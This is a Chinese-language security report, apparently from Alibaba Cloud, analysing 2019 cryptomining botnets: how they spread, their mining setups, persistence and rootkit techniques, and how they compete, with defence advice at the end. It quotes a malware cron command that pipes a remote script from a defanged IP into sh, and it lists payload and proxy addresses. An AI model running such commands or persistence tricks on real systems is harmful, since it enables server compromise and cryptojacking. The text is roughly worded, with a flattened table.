前言比特币等虚拟货币在2019年迎来久违的暴涨,从最低3000美元涨至7月14000美元,涨幅300%,巨大的金钱诱惑让更多的黑产团伙加入到恶意挖矿的行列。通过对云端僵尸网络家族的监测,阿里云安全团队发现,恶意挖矿已经成为黑产集团的主要营利手段。2019年共监测到58个大型挖矿木马群(数据截至8月底),木马活跃度以累计感染数来定义。下图/表格展示了活跃的TOP10木马家族及其概况。本文试图从宏观角度分析总结挖矿木马的常用技术和发展趋势,希望能给企业安全防护带来启示。.LinuxSSH、Redis爆破MinerGuard,Go语言实现的挖矿僵尸网络,2019年4月在Windows、Linux双平台SSH、Redis、Sqlserver爆破、各种web服务漏洞(ElasticSearch、Weblogic、Spring、ThinkPHP等)kerberods20194月爆发的挖矿僵尸网络始于LinuxSSH爆破、Redis爆破、ConfluenceRCE等Web服务漏洞kworkerdsrootkit挖矿蠕虫,2018年9月首次曝光Linux、Windows双平台ssh、redis爆破、WebLogic远程代码执行漏洞等buleheroWindows以下挖矿蠕虫于2018年8月首次曝光。Windows永恒之蓝漏洞、ipc$爆破、Struts2RCE、ThinkPHPRCE等多个Web服务漏洞。CryptoSink于2019年3月开始爆发,解析其他矿池地址为127.0.0.1Linux,Windows双平台ElasticSearch未授权访问漏洞,Redis爆破systemdMiner于2019年4月爆发,借助ddgsc&c入侵服务器快速扩大LinuxHadoopYarn未授权访问漏洞,2019年2月SSH密钥看门狗爆发,Linux蠕虫下挖矿LinuxSSH爆破,Redis爆破8220Miner8220挖矿团伙是国内长期活跃的利用多个漏洞攻击部署挖矿程序的团伙.多个Web服务漏洞,如未授权访问漏洞。由ibusPerl脚本实现的挖矿蠕虫。LinuxThinkPHP5RCE、java反序列化漏洞、WeblogicWLS组件RCE漏洞、WebLogic任意文件上传漏洞、redis未授权访问漏洞2019年1月开始爆发核心观点是木马投放方式完全可蠕虫,结合多重漏洞已成趋势,N-day漏洞利用速度正在加快这种趋势无疑是极其令人担忧的,这意味着挖矿木马的传播能力大大增强并变得无孔不入。一旦企业信息系统出现可被利用的漏洞,企业内网将迅速陷落,挖矿活动抢占CPU资源,严重影响企业信息系统的运行。这对企业漏洞管理和安全防御能力提出了更高更快的要求。木马持久化技术已经成熟利用,rootkit、fileless技术成为趋势挖木马入侵成功??后,希望能够长期稳定地挖出虚拟货币。其技术采用rootkit、fileless等技术实现长期隐蔽运行。对于一般的运维人员来说,系统一旦上岗,顽固的木马就很难清除,这就需要企业具备更专业的安全应急能力。木马开始呈现跨平台趋势Golang语言天生就具备跨平台编译能力。此功能方便了黑产团伙在多个平台之间的移植。新的恶意软件使用GO也成为一种趋势。TOP10中有6个是2019年爆发的挖矿木马,其中5个是用GO语言实现的。MinerGuard和kworkerds已经具备了在Linux/Windows双平台上传播的能力。心想事成,利器攻击技术全网漏洞扫描/投放->蠕虫投放1.利用单个或多个IP攻击全网漏洞进行投放。这种投放方式比较原始,没有水平传输能力,效率较低,容易被防御方拦截。在我们的监控中,使用这种方式的木马规模普遍较小。例如:8220Miner定期使用多个国外IP进行连续攻击,会定期更换IP,但更换频率较低。ddsMiner通过sqlserver入侵时,攻击payload会下载一个名为dds.exe的PE文件(如:[http://113[.]69[.]206[.]219:4523/dds.exe)](https://yq.aliyun.com/go/arti...,该团伙每天至少使用一个新IP对全网进行攻击,攻击持续数小时,该IP也是某某的恶意文件托管站2.蠕虫化类蠕虫挖矿僵尸网络有一个攻击模块,可以扫描感染网络上的其他服务器,这种方式的传播会以指数级的速度扩大,这种方式会增加溯源和防御的难度。TOP102019年爆发的多起挖矿僵尸网络均采用蠕虫传播方式,均在短时间内(数日)迅速扩张,跻身TOP10单一漏洞利用->组合漏洞横向传播早期挖矿木马horses利用固定漏洞在公网传播,传播速度和规模有限,多个漏洞的组合使得挖矿木马具备在内网横向传播的能力,攻击模块会集成通用WEB服务漏洞,爆破、数据库漏洞等攻击手段。“聪明”的挖矿木马作者甚至在内网和外网采用不同的攻击策略,以提高传播效率。例如,Windows平台下的Bulehero挖矿木马利用永恒之蓝漏洞、ipc$爆破、RDP爆破在内网率先传播,利用Web服务漏洞在公网率先传播。Linux平台下的kerberods挖矿木马首先利用本地ssh密钥和ssh爆破在内网进行传播。在这种高效的策略下,企业内网通常会在几分钟内被完全入侵。N-day漏洞很快被利用。互联网上大规模存在且未被修复的常见漏洞往往成为挖矿僵尸网络的“肥肉”。N-day漏洞爆发后,短时间内很难得到有效修复。“嗅觉”灵敏黑产团伙即将被列入挖矿木马的武器库。根据我们的观察,留给运维人员修复漏洞的N-day窗口越来越短。比如2017年5月发现的Jboss反序列化漏洞,年底JbossMiner开始大规模利用。2018年12月,ThinkPhp远程代码执行漏洞爆发,十多天后被BuleHero团伙利用。2019年4月8日,ConfluenceRCE漏洞利用POC发布。4月10日,kererods蠕虫开始利用该漏洞进行疯狂传播,间隔只有两天。再次对云平台和用户的快速响应能力提出严峻考验。致富之路-盈利的艺术矿池配置方法:挖矿木马植入开源挖矿程序进行挖矿。矿机程序启动时,通过命令行传入挖矿参数。木马无法修改配置参数。第二种方式是使用配置文件下发,结合定时任务实现对挖矿参数的控制,这种使用方式比较常见。以上两种方法都很容易被检测到。一些黑业团伙会对开源挖矿程序进行二次开发,将矿机配置参数硬编码为恶意程序,并进行反包检测,实现隐蔽挖矿。矿山的目的。挖矿程序命令行配置通过配置文件:MinerGuard矿机配置文件截图挖矿软件硬编码配置ddgs硬编码矿池和钱包地址挖矿方式:公开矿池->矿池代理1、公开矿池方式匿名公开矿池是最常见的恶意挖矿方式。它们使用方便,但由于需要配置独立的钱包地址,容易被追踪和追查,对bot挖矿没有管理能力。下图是查询8220Miner在公有矿池的钱包地址和算力。目前该地址已挖出15.5个门罗币,可以用来估算挖矿僵尸网络的规模。2.矿池代理有些挖矿僵尸网络会搭建自己的矿池代理。通过代理可以降低挖矿难度,可以根据收益随时切换高收益矿池和高收益挖矿币种。该方法不能通过钱包地址进行。追踪。下图为masscanMiner使用矿池代理挖矿。通过进程cmdline可以看到矿池在121.42.151.137的28850端口是开放的。这不是公共矿池的公共端口,登录账号也是默认账号。其他变现方式:附带DDos和Socks代理。除了挖矿,一些黑业团伙还会通过DDos、代理等其他方式进行变现。如下图所示,sicMiner恶意样本会运行一个python脚本,该脚本是github上开源的socks5代理。代理在端口7081上运行。团伙可能会出售代理以换取现金。Tobeornottobe-Persistence挖矿木马入侵成功??后,需要长期驻留在目标操作系统中,才能实现虚拟货币的长期稳定生产。通常使用各种技术来抵制运维人员的安全检测和清除。清除/卸载安全软件卸载主机安全防护软件是常规操作。由于挖矿攻击主要针对服务器,因此黑产团伙也专门针对云环境中的安全软件。kworderds蠕虫在windows和Linux下卸载不同安全软件的行为如下。kworkerds禁用杀毒软件kworkerds挖矿蠕虫,卸载Anknight等安全工具。写入用户的crontab,也会写入软件包的crontab,比如/etc/cron.d,这样不容易被发现。Windows下通过调度任务和修改注册表来实现类似的驻留方法。以下是crondtab启动的ddgs蠕虫恶意进程的行为。ddgs通过CROND定时任务启动恶意shell:/bin/sh-ccurl-fsSL[http://218[.]248[.]40[.]228:9999/i.sh?6](https://yq.aliyun.com/go/arti...|sh2、动态链接库预加载型rootkitLinux下的动态链接库预加载机制会在加载其他常规系统库之前预加载用户自定义的动态链接库。定义库与系统库中的函数同名,自定义动态链接库会覆盖系统库中的函数。攻击者通过预加载动态链接库实现libc中readdir等常用函数的hook,隐藏ps、top等shell命令尝试读取/proc/目录获取进程信息时的恶意性。下图为8220miner利用该技术劫持Linux动态链接库配置文件/etc/ld.so.preload。无文件攻击技术无文件攻击不需要将恶意软件投放到磁盘中,因此很难被杀毒软件发现和查杀,具有更好的隐蔽性。在挖掘僵尸网络中,通常使用各种工具(如WindowsWMI命令行工具wmic.exe)或脚本语言提供的API接口(如PowerShell)访问WMI,实现无文件攻击。下面是TheHidden使用wmic和WannaMine使用powershell进行无文件攻击。TheHidden利用wmic无文件攻击代码片段WannaMine恶意进程利用powershell隐藏编码功能进行无文件攻击文件名/路径混淆除了要对抗各种安全工具外,还要对抗运维人员的人工检查.混淆也很常用。例如,ibus会将恶意文件写入多个系统目录,通过随机改变大小写生成与隐藏目录中文件名相似的混淆文件名。ibus在系统目录下生成混淆目录ibus生成混淆文件名c&c通信由于恶意挖矿行为不需要对bots有很强的控制能力,大部分挖矿木马都没有完整的c&c控制模块,通常使用配置文件结合Scheduled为机器人实施配置更改和版本更新的任务。TOP10中只有ddgs和ibus有完整的c&c控制功能。例如ddgs使用uMsg序列化进行c&c通信,可以实现攻击命令下发、版本配置更新等功能。在今年1月份的更新中,甚至开始使用P2P方式下发c&c控制IP。ddgs反序列化的c&c控制命令是ibus的c&c控制模块的恶意代码。2018年底以来,挖矿木马频频利用暗网进行恶意文件托管。由于其匿名通信的特点,它在恶意软件中变得流行起来。以下是watchbog蠕虫利用暗网地址下载恶意文件。watchbog蠕虫使用暗网地址下载恶意文件。文件类型伪装为了防止被追踪和追踪,黑客喜欢在公共免费网站上托管恶意文件。他们需要将恶意shell和二进制文件伪装成图片以防止被发现。将二进制/shell文件伪装成图像文件是一种常规操作。后门账户除了常规常驻操作外,我们还监测到多个在主机上留下后门账户的挖矿木马。即使木马被清除,黑客仍然可以通过后门账户。再次入侵。TheHidden添加了一个后门账户,账户名为admin,并隐藏了该账户。watchdog加了后门sshkey,江湖人怎能不吃亏——资源竞争的艺术除了安全软件的对抗,挖矿僵尸网络还面临同行的竞争。毕竟CPU资源是有限的,不能一机两用!查杀竞争进程几乎是挖矿木马的常规操作。它使用进程指纹库判断其他挖矿进程,或者直接杀掉CPU占用率高的进程。资源竞争的kerberods进程指纹库修改防火墙,修改防火墙的iptables,关闭易受攻击的服务端口,防止其他挖矿木马入侵。或关闭公共矿池端口以阻止竞争对手的挖矿活动。修改iptables配置以进行资源竞争。通过修改/etc/hosts来修改hosts为sinkhole竞争对手的域名和普通矿池域名,也是一种资源竞争的手段。我们也看到了相应的对策:判断/etc/hosts是否被修改,重写/etc/hosts进行覆盖。伪装者的对策:改写主机,利用其他僵尸网络除了上述常规的竞争手段外,利用其他僵尸网络进行传播也是一种巧妙的手段。今年4月,systemdMiner“借鸡下蛋”,通过入侵ddgs的c&c中控主机迅速扩张。SystemdMiner利用ddgs中控下发的shell防护建议1.企业需要及时管理和修复漏洞,否则很容易成为挖矿木马的受害者。2、推荐使用阿里云安全下一代云防火墙产品,可以阻断恶意外联,配置智能策略,可以有效帮助防止入侵。无论攻击者在主机上的隐藏手段多么巧妙,下载、挖矿、回壳等操作都需要恶意外联;云防火墙的拦截将彻底阻断攻击链。此外,用户还可以通过自定义策略直接阻断恶意网站,达到阻断入侵的目的。此外,云防火墙独有的虚拟补丁功能可以帮助客户更灵活、更“无感”地阻断攻击。3、对于定制化要求较高的用户,可以考虑使用阿里云安全管家服务。购买服务后,经验丰富的安全专家将提供咨询服务,定制适合您的解决方案,帮助加固系统,防止入侵。入侵事件发生后,还可以直接介入,协助进行入侵后清理、事件溯源等,适合对安全要求高的用户,或者没有聘请安全工程师但又想保证系统安全的公司。本文作者:三多阅读原文,为云栖社区原创内容,未经允许不得转载。
